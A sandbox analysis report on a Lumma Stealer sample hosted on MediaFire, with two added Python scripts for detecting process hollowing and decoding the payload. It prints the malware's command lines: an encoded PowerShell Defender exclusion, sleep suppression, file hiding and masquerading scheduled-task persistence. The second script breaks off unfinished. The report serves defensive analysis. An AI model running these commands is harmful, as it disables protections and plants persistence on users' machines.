Analysis Overview
Threat Level: Known bad
The submitted URL https://www.mediafire.com/folder/6q6psz38mqj7b was found to be: Known bad.
Malicious Activity Summary
Lumma Stealer
Downloads MZ/PE file
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Checks computer location settings
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Power Settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Scheduled Task/Job: Scheduled Task
Enumerates system info in registry
Views/modifies file attributes
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-05 13:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-05 13:58
Reported
2024-07-05 14:01
Platform
win10v2004-20240704-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
Lumma Stealer
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\K3T1CRW47T00VJQDGK2TZ7USUH7.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\K3T1CRW47T00VJQDGK2TZ7USUH7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5176 set thread context of 5028 | N/A | C:\Users\Admin\Downloads\Aura\Aura\Aura.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Downloads\Aura\Aura\Aura.exe |
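The SetThreadContext signature (Aura.exe, PID 5176, rewriting the thread context of the RegAsm.exe it launched, PID 5028, a step consistent with process hollowing) and the Program crash signature (WerFault.exe reporting on Aura.exe with -p 5176 in the process list below) are the two observable halves of one event chain. A process-creation telemetry source such as Sysmon Event ID 1 does not record SetThreadContext, so a detection has to key off what is visible: a .NET utility launched with no arguments by a parent running from a user-writable directory, followed by a WerFault report naming that parent. The script below is an added example written for this page, not tooling from the report or from the sandbox vendor. The events are constructed to mirror the report's process list: only PIDs 5176 and 5028 come from the report; every other PID, the parent PIDs, the developer control event and the list of .NET host binaries are assumptions.

```python
import re

# Assumption: .NET utilities commonly started bare and used as injection hosts.
HOLLOW_HOSTS = {"regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe", "applaunch.exe"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed Sysmon Event ID 1 style records modelled on this report's process
# list. PIDs 5176 (Aura.exe) and 5028 (RegAsm.exe) are from the report; every
# other PID, and the two developer control events, are invented for the sample.
EVENTS = [
    {"pid": 5176, "ppid": 4400,
     "image": r"C:\Users\Admin\Downloads\Aura\Aura\Aura.exe",
     "cmdline": r'"C:\Users\Admin\Downloads\Aura\Aura\Aura.exe"'},
    {"pid": 5028, "ppid": 5176,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'},
    # WerFault is started by the WER service, not by the crashing process, so
    # the link to the injector is the -p argument rather than the parent PID.
    {"pid": 6100, "ppid": 1300,
     "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 308"},
    # Benign control: Visual Studio registering a COM-visible assembly.
    {"pid": 2200, "ppid": 900,
     "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "cmdline": r'"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe"'},
    {"pid": 7000, "ppid": 2200,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" /codebase MyLib.dll'},
]


def args_after_image(ev):
    """Command-line tail after the (possibly quoted) image path; "" means bare."""
    cmd = ev["cmdline"].strip()
    if cmd.startswith('"'):
        parts = cmd[1:].split('"', 1)
        return parts[1].strip() if len(parts) == 2 else ""
    if cmd.lower().startswith(ev["image"].lower()):
        return cmd[len(ev["image"]):].strip()
    return cmd


def from_trusted_dir(image):
    return image.lower().startswith(TRUSTED_DIRS)


def detect(events):
    """Rule 1: a hollowing host spawned with no arguments by a parent outside
    the trusted directories. Rule 2: a WerFault report (-p <pid>) naming one
    of those parents as the crashed process."""
    by_pid = {e["pid"]: e for e in events}
    alerts, injectors = [], set()
    for e in events:
        host = e["image"].rsplit("\\", 1)[-1].lower()
        parent = by_pid.get(e["ppid"])
        if (host in HOLLOW_HOSTS and args_after_image(e) == ""
                and parent is not None and not from_trusted_dir(parent["image"])):
            alerts.append({"rule": "bare-dotnet-host-from-untrusted-parent",
                           "pid": e["pid"], "parent_pid": parent["pid"],
                           "parent_image": parent["image"]})
            injectors.add(parent["pid"])
    for e in events:
        if e["image"].lower().endswith("\\werfault.exe"):
            m = re.search(r"-p\s+(\d+)", e["cmdline"])
            if m and int(m.group(1)) in injectors:
                alerts.append({"rule": "suspected-injector-crashed",
                               "pid": int(m.group(1)), "reporter_pid": e["pid"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The first rule alone would fire on any bare RegAsm.exe launch from a user directory, which is rare but not unheard of; the WerFault correlation is what turns it into a high-confidence hit for this sample, because an injector that crashes after hollowing its host is exactly what the report's Program crash signature recorded.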
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/folder/6q6psz38mqj7b
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9c89f46f8,0x7ff9c89f4708,0x7ff9c89f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6924 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5904 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7124 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4764 /prefetch:2
C:\Users\Admin\Downloads\Aura\Aura\Aura.exe
"C:\Users\Admin\Downloads\Aura\Aura\Aura.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5176 -ip 5176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 308
C:\Users\Admin\AppData\Local\Temp\K3T1CRW47T00VJQDGK2TZ7USUH7.exe
"C:\Users\Admin\AppData\Local\Temp\K3T1CRW47T00VJQDGK2TZ7USUH7.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p1404753551733818025492326517 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "Installer.exe"
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
"Installer.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAE0AdwBSAEQAOAA2ADMATQBCACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMARABZAGEAOABKAE4AcQBIACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEgAaQBzAEMAVAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AFQAMQBDAFIAOABjADYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAE0AdwBSAEQAOAA2ADMATQBCACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMARABZAGEAOABKAE4AcQBIACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEgAaQBzAEMAVAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AFQAMQBDAFIAOABjADYAIwA+AA=="
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3605" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3605" /TR "C:\ProgramData\Dllhost\dllhost.exe"
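The command lines above chain a Defender exclusion hidden in an -EncodedCommand payload, sleep suppression via powercfg, extraction of a password-protected archive, hiding of the dropped Installer.exe, and two scheduled tasks pointing at a user-writable path. The Python script below is an added example written for this page, not part of the report or of any tool it names: it decodes the -EncodedCommand string (base64 over UTF-16LE, so a UTF-8 decode would yield NUL-riddled garbage), strips the random `<# ... #>` block comments inserted to break string matching, and pulls the persistence and defence-evasion details out of the report's own command lines. The set of Windows binary names used to spot a masquerading task name and the list of user-writable directories are assumptions, not from the report.

```python
import base64
import re

# The -EncodedCommand payload exactly as it appears in the process list above.
ENCODED = (
    "PAAjAE0AdwBSAEQAOAA2ADMATQBCACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMA"
    "RABZAGEAOABKAE4AcQBIACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoA"
    "VQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEgA"
    "aQBzAEMAVAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AFQAMQBDAFIAOABjADYAIwA+AA=="
)

# Command lines copied from the Processes section of this report.
COMMAND_LINES = [
    '"cmd.exe" /C powershell -EncodedCommand "' + ENCODED + '" & powercfg /x -hibernate-timeout-ac 0'
    " & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0"
    " & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off",
    r'SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"',
    r'SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3605" /TR "C:\ProgramData\Dllhost\dllhost.exe"',
    "7z.exe e file.zip -p1404753551733818025492326517 -oextracted",
    'attrib +H "Installer.exe"',
]

# Assumptions, not from the report: names of Windows binaries commonly borrowed
# for task names, and directories a standard user can write to.
SYSTEM_NAMES = {"dllhost", "svchost", "conhost", "csrss", "lsass", "wininit"}
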